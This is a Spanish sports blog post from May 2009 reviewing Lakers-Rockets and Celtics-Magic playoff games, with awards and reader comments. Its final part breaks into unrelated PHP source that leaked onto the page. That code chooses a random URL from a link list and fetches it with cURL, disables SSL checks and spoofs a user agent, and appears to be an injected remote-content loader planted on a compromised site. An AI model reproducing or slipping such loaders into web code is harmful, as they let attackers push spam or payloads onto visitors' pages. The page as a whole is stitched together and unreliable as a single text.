Playoffs (06/05/2009): Not in my House!

07 de May de 2009 por MagicJohnson32

La noche dejó dos buenos partidos, dos victorias necesarias para los finalistas del año pasado que, de esta manera, igualan sus respectivas series. Ambos habían cedido la ventaja de campo en el primer partido y no podían permitirse otro tropiezo como locales. Así ocurrió, tal como detallamos a continuación:

kobevsartest6 de mayo. Es la fecha en la que los Lakers decidieron que sus Playoffs habían empezado. Tras seis partidos dubitativos, anoche el cuadro angelino mostró una actitud propia de las circunstancias e igualó la eliminatoria en un partido de trinchera, eléctrico, duro y vibrante; un partido, al fin y al cabo, de Playoffs. De esta manera, la serie viaja con 1-1 a Houston, donde probablemente veamos una continuación de lo de anoche: 5 técnicas, 1 flagrante y 2 expulsados en una batalla muy física pero que no dejó de ofrecer buen baloncesto. Kobe Bryant, extremadamente motivado, volvió a anotar mucho y bien ante Battier y Artest y firmó 40 puntos con magníficos porcentajes. Gasol, esta vez sí, fue efectivo y se marchó hasta los 22 con 9 de 13 en tiros, 14 rebotes y 4 tapones, tal vez más cómodo al regresar a la posición de pívot después de que Jackson condenase a Bynum al fondo del banquillo. En los Rockets, el más destacado fue Artest, con 25 puntos antes de irse a los vestuarios expulsado por sus aparatosas protestas tras una lucha bajo los aros con Bryant en la que el jugador de los Lakers golpeó con el codo a Ron-Ron (aunque no parece suficiente como para una sanción habrá que estar atentos a la decisión de Stu Jackson); sin embargo, Yao tuvo problemas de faltas y sólo lanzó 4 veces a canasta en 26 minutos. Pese a que Landry lo compensó con 21 puntos y 10 rebotes, el escaso acierto de Scola, Brooks y Battier pasó factura a unos Rockets que, por otra parte, ya habían cumplido con su victoria en el partido inicial de una eliminatoria que se presenta apasionante.

La conclusión es muy similar por lo que respecta al Celtics-Magic. Los de Orlando, que en el primer partido robaron la ventaja de campo, cayeron anoche y vieron cómo Boston equilibraba la serie en una exhibición de Rondo y House.

rondodunkEl base firmó su tercer triple-doble de los Playoffs, todo un hito teniendo en cuenta que en toda la historia de la franquicia sólo Larry Bird había conseguido algo así. Rondo dirigió el triunfo con 15 puntos, 18 asistencias y 11 rebotes. El estilete ofensivo fue House, quien aprovechó los problemas de faltas de Pierce para hacer 31 puntos, 20 de ellos en la segunda mitad, con 11 de 14 en tiros de campo, incluyendo 4 triples sin fallo. House protagonizó, además, un encontronazo con Rafer Alston que acabó con el base ex-Rockets expulsado. Los 22 puntos, 6 rebotes y 4 asistencias de Allen y las buenas aportaciones de Davis y Perkins hicieron el resto. Los Magic siempre fueron por detrás, caían por 15 al descanso y ofrecieron escasa batalla, tal vez reservándose para mejores ocasiones. Howard se quedó en 12 puntos, 12 rebotes, con 5 pérdidas y sin tapones; Turkoglu estuvo muy discreto y sólo Lewis, con 17 puntos y 10 rebotes, cumplió. Curiosamente, es la primera vez que los Celtics ganan un partido de Playoffs a los Magic.

PREMIOS

MVP: Rondo por un lado, Kobe por el otro. Ambos condujeron a sus equipos a sendas victorias con magníficas actuaciones. Rondo volvió a conseguir un triple doble, el quinto de la temporada y tercero de los Playoffs. Y si el base iguala a Larry Bird como único celtic en conseguir tres triples-dobles en Playoffs, Kobe alstonhouseBryant se quedó a tres puntos de igualar al mítico pájaro en cuanto a puntos anotados en postemporada. Kobe superó a dos de los mejores defensores exteriores de la liga y protagonizó alguna jugada para enmarcar como un auto alley-oop a tablero que finalizó con una bandeja sobre Yao.

El rookie: La baja de Courtney Lee nos dejó huérfanos de rookies anoche.

La sorpresa: La máxima anotación de Eddie House en un partido de Playoffs hasta la fecha eran 16 puntos. Anoche anotó 31 en una demostración que el propio Stan Van Gundy calificó como algo que no había visto en su vida.

La decepción: Howard y Yao, los dos grandes pívots de la actualidad, estuvieron muy discretos en las derrotas de sus respectivos equipos. Orlando y Houston necesitan mucho más de ellos, y seguro que lo darán en próximas citas.

El mayor esfuerzo en vano: De entre los perdedores destacan Artest y, especialmente, un Carl Landry que aprovechó sus 24 minutos en pista para anotar 21 puntos y atrapar 10 rebotes, algo sólo eclipsado por sus fallos en los tiros libres y sus 5 pérdidas.

Comenta

9 comentarios a esta entrada

  1. Txusma dice:
    #1

    Ojito a los 3 puntos de Paul Pierce ayer. Creo q su peor anotacion de siempre…

    Y bueno, Artest se ganó la expulsión por sus airadas protestas aunq tuviera razon. En una lucha por un rebote Kobe le suelta el codo claramente y le pitan falta a él! Soltar el codo no es motivo de sancion para el siguiente partido? O solo se premia si se impacta?

      Citar

  2. TheDeerHunter dice:
    #2

    Varias cosas… yo creo que el premio de rookies lo deberíaimos dejar ya un poquito de lado. Nos ahorramos una línea para decir que no jugó ninguno (aunque se rumorea que Lee volverá para el tercer partido)

    Sobre el codazo de Kobe diría que hay cientos durante la temporada. Si lo hubieran pitado creo que sería tan flagrante como el oxtión de Rondo a Miller…y si me apuras expulsión, pero en ningún caso sanción.
    Después, hay que hablar del clínic defensivo de Gasol anoche sobre Yao, más allá de los problemas de faltas y mucho más trascendente que los 20 puntacos que metió. Lo mismo Odom que, jugando un mal partido ofensivamente mordía como un bulldog (aunque Scola le mea por encima y casi nos revienta el partido) Se dieron algunos garrotazos anoche en el Staples que en la vida (en LA mejor que sobren que no que falten)

    De Pierce, problemas de faltas. Pero sin él Rivers se montó un small-ball que no era el que nosostros preveíamos. Mérito suyo, para que luego digan que es todo el plantillón que tiene. Ya le gustaría a otros ilustres tener la capacidad de adaptación y de poner patas arriba el guión establecido que tiene éste.

    Por último: Quinteto defensivo: Paul, Kobe, Lebron, Garnett y Howard (lo lógico)
    En el segundo quedan Rondo, Wade, Battier, Artest y Duncan. Ojito que Houston tiene a dos de estos… es un equipazo en el sentido defensivo. Rondo o Wade no hubieran desentonado tampoco arriba.

      Citar

  3. TheDeerHunter dice:
    #3

    y vaya tela Bynum… nos quejábamos el año pasado de Turiaf

    este chico tiene que hacérselo mirar

      Citar

  4. MagicJohnson32 dice:
    #4

    Este chico (Bynum) no está en condiciones de jugar. Al menos es la sensación que me estaba dando en los últimos partidos. Se le ve poco ágil, apenas salta y le falta fluidez. Parece como si llevase más de 3 meses de baja. ¿Ah, que llevaba más de 3 meses de baja? Pues eso.

      Citar

  5. TheDeerHunter dice:
    #5

    Creo que jugó los últimos de la regular y no lo hizo nada mal. Lleva casi un mes recuperado, hombre….
    ¿cuantos llevaba Josh Howard?? o ¿en qué condiciones jugó anoche Walton??
    No me digas que la bandeja que falló en el último cuarto es por los 3 meses de baja.

    Lo que lleva el amigo es un careto de Lost, que ni el Hugo ese…

    En cualquier caso, espero que sea como tú dices. Faltaría más.

      Citar

  6. telekoman dice:
    #6

    El problema es que parece que el amigo Phil se está habituando a volver a jugar sin él y eso en el fondo le puede pasar factura a Pau, que va a llegar fundido a la siguiente ronda. Y allí Nené va a ser un nuevo problema.

      Citar

  7. arivas dice:
    #7

    Lo de Rondo empieza a ser escandaloso.

      Citar

  8. Landrusski dice:
    #8

    Lo de Rondo es ESPECTACULAR!!!!!!!

      Citar

  9. Jabho dice:
    #9

    Los PO de ROndo están siendo soberbios, sin duda.

    Estoy siguiendo la serie de los Celtics, tb contra los Bulls, y destacar lo que comenta Deer de Rivers. Ya estuvo muy bien tácticamente en las finales del año pasado por ejemplo, pero ayer puso a Scalabrine titular para frenar a Lewis y en buena manera lo consiguió y con lo poco que tiene está moviendo muy bien a los jugadores.

    Marbury está dando alguna muestra que sigue sabiendo jugar a esto… Moore missing

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>